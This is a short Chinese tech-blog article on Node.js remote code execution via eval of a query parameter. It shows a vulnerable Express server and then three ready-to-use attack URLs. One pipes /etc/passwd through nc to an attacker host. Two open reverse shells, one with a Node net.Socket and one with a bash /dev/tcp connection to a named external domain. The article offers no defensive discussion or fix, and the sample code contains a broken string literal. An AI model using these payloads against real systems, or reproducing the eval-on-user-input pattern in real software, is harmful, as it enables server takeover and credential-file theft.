NodeJS远程代码执行
更新时间:2016年08月28日 15:30:03 投稿:hebedich
这篇文章主要介绍了NodeJS远程代码执行方法的相关资料,需要的朋友可以参考下
背景
@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。
测试
var express = require('express');
var app = express();
app.get('/', function (req, res) {
res.send('Hello eval(req.query.q));
console.log(req.query.q);
});
app.listen(8080, function () {
console.log('Example listening on port 8080!');
});
任意文件读取
http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')
GET SHELL
http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
GET SHELL2
http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')
相关文章
最近工作中需要对身份证号的年龄、出生日期与性别进行验证,所以这篇文章主要介绍了Node.js通过身份证号验证年龄、出生日期与性别的方法,在介绍完node.js的实现方法后又给大家分类的利用JS实现的方法,需要的朋友可以参考下。2017-03-03
本文主要介绍了Node.js使用WebAssembly,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2023-05-05
这篇文章主要介绍了详解利用nodejs对本地json文件进行增删改查,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2019-09-09
这篇文章主要介绍了nodejs npm包管理的配置方法及常用命令介绍,需要的朋友可以参考下2014-06-06
开启网站的 gzip 压缩功能,通常可以高达70%,也就是说,如果你的网页有30K,压缩之后就变成9K, 对于大部分网站,显然可以明显提高浏览速度(注:需要浏览器支持)。2017-08-08
这篇文章主要介绍了nodejs基础之常用工具模块util用法,结合实例形式分析了nodejs核心工具模块util功能、相关函数与使用方法,需要的朋友可以参考下2018-12-12
在项目开发过程中,不同项目使用的nodejs版本不同,有时会因为node版本过高或太低,导致报错,本文主要介绍了node.js版本降级/升级的实现,具有一定的参考价值,感兴趣的可以了解一下2024-05-05
下面小编就为大家带来一篇基于node.js的fs核心模块读写文件操作(实例讲解)。小编觉得挺不错的,现在就想给大家,也给大家做个参考。一起跟随小编过来看看吧2017-09-09
这篇文章主要介绍了node中实现删除目录的几种方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2019-06-06
这篇文章主要为大家介绍了nodejs发布静态https服务器的步骤指南,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪2024-02-02
最新评论